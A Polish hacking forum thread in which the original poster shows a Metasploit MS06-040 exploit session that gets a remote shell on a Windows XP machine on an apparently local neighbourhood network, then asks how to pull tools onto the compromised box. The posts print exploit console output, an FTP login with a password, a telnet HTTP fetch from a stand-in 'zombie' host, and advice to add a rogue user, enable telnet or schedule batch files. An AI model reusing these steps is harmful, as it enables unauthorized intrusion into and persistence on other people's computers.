Pokaż wyniki 1 do 10 z 16

Temat: metasploit, download problem ;[

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1

    Domyślnie metasploit, download problem ;[

    wszystko działa, wszystko cacy, natomiast po wejsciu do w sumie gołego systemu problem jest następujący, nie ma nic, co umożliwiłoby łatwe proste i przyjemne ściągnięcie nań potrzebnych narzędzi.

    Kod:
    msf netapi_ms06_040(win32_bind) > set RHOST 10.0.10.170
    RHOST -> 10.0.10.170
    msf netapi_ms06_040(win32_bind) > exploit[*] Starting Bind Handler.[*] Detected a Windows XP target[*] This will not work on SP2![*] Sending request...[*] The server rejected it, trying again...[*] This system may be patched or running Windows XP SP1 or SP2[*] RPC server responded with:[*] RESPONSE => response[*] STUB DATA = \x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7D\x00\x00\x00\x4B\x08\x00\x00[*] Exiting Bind Handler.
    msf netapi_ms06_040(win32_bind) > unset RHOST
    msf netapi_ms06_040(win32_bind) > set RHOST 10.0.8.63
    RHOST -> 10.0.8.63
    msf netapi_ms06_040(win32_bind) > exploit[*] Starting Bind Handler.[*] Detected a Windows XP target[*] This will not work on SP2![*] Sending request...[*] The server rejected it, trying again...[*] Got connection from 10.0.9.4:54810 <-> 10.0.8.63:4444
    
    Microsoft Windows XP [Wersja 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\WINDOWS\system32>
    no i jesteśmy... ale dalej...
    spróbujmy sciągnąc coś z ftp...

    Kod:
    Microsoft Windows XP [Wersja 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\WINDOWS\system32>ftp
    ftp
    open agregator.w.interia.pl
    Uytkownik (agregator.w.interia.pl:(none)): agregator
    m3f1st0f3l3s
    dir
    
    quit
    chujwiecojeszcze ;-)
    wynik jest taki sam - brak odpowiedzi od terminala, co mnie bardzo martwi... ;-)

    dopiero po ctrl+c terminal reaguje:
    Kod:
    Caught interrupt, exit connection? [y/n] Dropping back to the console...
    
    Caught interrupt, exit connection? [y/n] y[*] Exiting Bind Handler.
    msf netapi_ms06_040(win32_bind) >
    i tu leży właśnie istota problemu: jak ściągnąc coś ze zdalnego komputera, używając konsoli wygenerowanej przez metasploit'y?

  2. #2
    Zarejestrowany
    Jun 2006
    Skąd
    Brok
    Postów
    42

    Domyślnie

    Nie znam się na tym, ale może ten komp albo router przez który się komunikuje ze światem ma we firewall'u zablokowane porty ftp :]

    Próbowałeś może przez telnet?

  3. #3

    Domyślnie

    1. próbowałem, nie ma tam firewalla (gdyby był, to nie wiem, czy bym się przebił tak łatwo ;-) ), i jest to zwykły box domowy, nie router.
    2. telnetem próbowałem, nie chodzi tutaj o to. kwestią jest to, że "środowisko" metasploita nie uruchamia (raczej nie wyświetla) "poprawnie" programów typu edit, ftp, telnet, także nie w tym sęk, o czym mówisz, ale wszelkie uwagi, koncepcje, mile widziane.
    3. jest kilka innych możliwości przejećia w pełni maszyny w takim przypadku, jak opisuje, tj. przez użycie odpowiednio zbudowanych komend echo:
    echo "komenda" >> do.pliku.txt
    i później użycie tego, jako wsadowych parametrów dla aplikacji.
    np. ftp.exe -slik.txt
    ale ten sposób też nie działa...
    inne sposoby to zbudowanie pliku.reg, ale nie wiem, czy aby nie będzie wymagane kliknięcie "Dodaj" od użytkownika siedzącego przy monitorze (co demaskuje nas na starcie ;-) (chociaż generalnie jest możliwość z konsoli wydania polecenia z parametrem /y jako potwierdzenia... :S nie wiem...
    dalszy sposób, to budowa pliku.bat ale też brak mi tu weny twórczej... także raz jeszcze: podpowiedzi, sugestje, pomysły jak najbardziej mile widziane ;-)

  4. #4
    Zarejestrowany
    Jun 2006
    Skąd
    Brok
    Postów
    42

    Domyślnie

    Po IP domyślam się że jesteście w tej samej sieci osiedlowej, no chyba że podałeś nam inne.

    A możesz zrobić coś takiego żeby przesłać jakiś plik *.bat, *.reg czy cokolwiek co odblokuje telnet a następnie będziesz mógł się zalogować przez niego na konto gościa, albo jakieś inne.

    Powiedzmy że jesteś w stanie przesłać tam dowolny plik, niech więc uruchomi się automatycznie o danej porze i wykona to co napisałem wyrzej, albo jeszcze inaczej, ta osoba najprawdopodbniej korzysta z konta administratora, więc mógłbyś założyć tam swoje własne konto.

  5. #5
    Zarejestrowany
    Jun 2006
    Skąd
    gory czasem doliny
    Postów
    156

    Domyślnie

    zalezy co chcesz zrobic z tamtym kompem. jezeli chcesz cos wyssac sa inne narzedzia ktore to zrobia. wg mnie nie liczy sie sposob ale wynik.
    BlackIceNavarro

  6. #6

    Domyślnie

    przykłady panowie... konkretne przykłady...? ;-)

  7. #7
    Zarejestrowany
    Jun 2006
    Skąd
    Polska, zachodniopomorskie
    Postów
    46

    Domyślnie

    Jeżeli ma zablokowane te porty, to musisz sobie otworzyć tunel do jakiegoś kompa, i przez ten tunel wszystko robić, na windowsie nie robiłem tunelu nigdy, inaczej spróbuj ściągnąć z http przez telneta,
    telnet my-zombie-ftp.some-fake-host.us 80
    GET /scorn/narzedzie.c HTTP/1.1

    wynik zapisz.

    To z głowy pisałem, więc nie gwarantuję nic
    Ostatnio edytowane przez I_v0 : 08-19-2006 - 16:45 Powód: notka

  8. #8

    Domyślnie

    kwestia tu jest taka sama jak przy fyp: nie daje wyniku zwrotnego i zazwyczaj trzeba zrywać połączenie i zaczynać od nowa (wykluczając opcje, że przy wpisaniu telnet w cmd.exe, odpala mu się okno telnetu jak przy win98 ;-) )

    inne pomysły?
    dodanie usera przez net user dalej net share?
    średnio mi wychodzi, albo cos jebie z komendami, jak ktoś chce, to poprosze konkretne przykłady ;S

  9. #9
    Zarejestrowany
    Aug 2006
    Skąd
    Poznań
    Postów
    3

    Domyślnie

    Scorn jezeli on ma winXP/2k to ma klienta, a jezeli to sieć lokalna to sciągnij tego serwera tftpd, do którego Ci linka podałem, uruchom u siebie i wtedy będziesz mógł nawiązać to połączenie.
    W serwerze u siebie tylko ustaw katalog, w którym masz plik, który chcesz przesłać i powinno Ci to chodzić.

  10. #10

    Domyślnie

    wine mi nie trawi tego, a na linucha nie chce mi się szukać teraz bo mam kaca ;-) (wogóle to jest na lina?)
    także wiesz... :>
    bardziej interesuje mnie opcja pt. net share, net user, ale mimo, że polecenia (niby) działają prawidłowo, bo "polecenie zostało wykonane pomyślnie" ale chuj z tym, bo i tak nie łapie... ;\

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj